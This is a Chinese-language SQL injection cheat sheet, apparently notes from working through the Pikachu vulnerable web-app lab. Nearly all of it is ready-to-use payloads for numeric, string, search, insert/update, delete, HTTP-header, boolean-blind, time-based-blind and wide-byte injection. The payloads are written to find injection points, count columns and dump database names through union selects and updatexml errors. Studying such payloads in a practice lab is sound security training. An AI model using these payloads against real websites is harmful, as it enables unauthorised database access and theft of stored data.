SQL-Inject
数字型注入(post)
# 确定显示列数
payload: id=1 order by 2&submit=%E6%9F%A5%E8%AF%A2
# 确定输出点
payload: id=1 union select 1,2&submit=%E6%9F%A5%E8%AF%A2
# 爆库、爆表、爆字段
payload: id=1 union select 1,database()&submit=%E6%9F%A5%E8%AF%A2
字符型注入(get)
# 确定注入点
payload: 1' or 1=1#
# 确定输出列数
payload: 1'order by 1,2,3#
# 确定输出点
payload: 1' union select 1,2#
# 爆库、爆表、爆字段
payload: 1' union select 1,database()#
搜索型注入
# 确定注入点
payload: a%' #
# 确定输出列数
payload: allen%' order by 3 #
# 确定输出点
payload: allen%' union select 1,2,3 #
# 爆库、爆表、爆字段
payload: allen%' union select 1,2,database() #
XX型注入
payload: 1'order by 1,2,3#
payload: 1') union select 1,2#
payload: 1') union select 1,database()#
"insert/update"注入
payload: 1' or updatexml(1,concat(0x7e,database()),0) or '
delete注入
-
抓包
-
构造payload
payload: or updatexml(1,concat(0x7e,database(),0x7e),0)
http头注入
-
抓包
-
构造payload
payload: ' or updatexml(1,concat(0x7e,database()),0) or '
基于bool的盲注
# 确定字符型注入
payload: 1' and 1=1 #
payload: 1' and 1=2 #
payload: allen' and 1=1 #
payload: allen' and length(database())=7 #
payload: allen' and substr(database(),1,1)='p' #
基于时间的盲注
payload: allen' and sleep(5)#
payload: kobe' and if(length(database())=7,sleep(5),null)#
payload: kobe' and if((substr(database(),1,1))='p',sleep(5),null)#
wide byte注入
payload: name=1%df' or 1=1#&submit=%E6%9F%A5%E8%AF%A2
payload: name=1%df' union select 1,database()#&submit=%E6%9F%A5%E8%AF%A2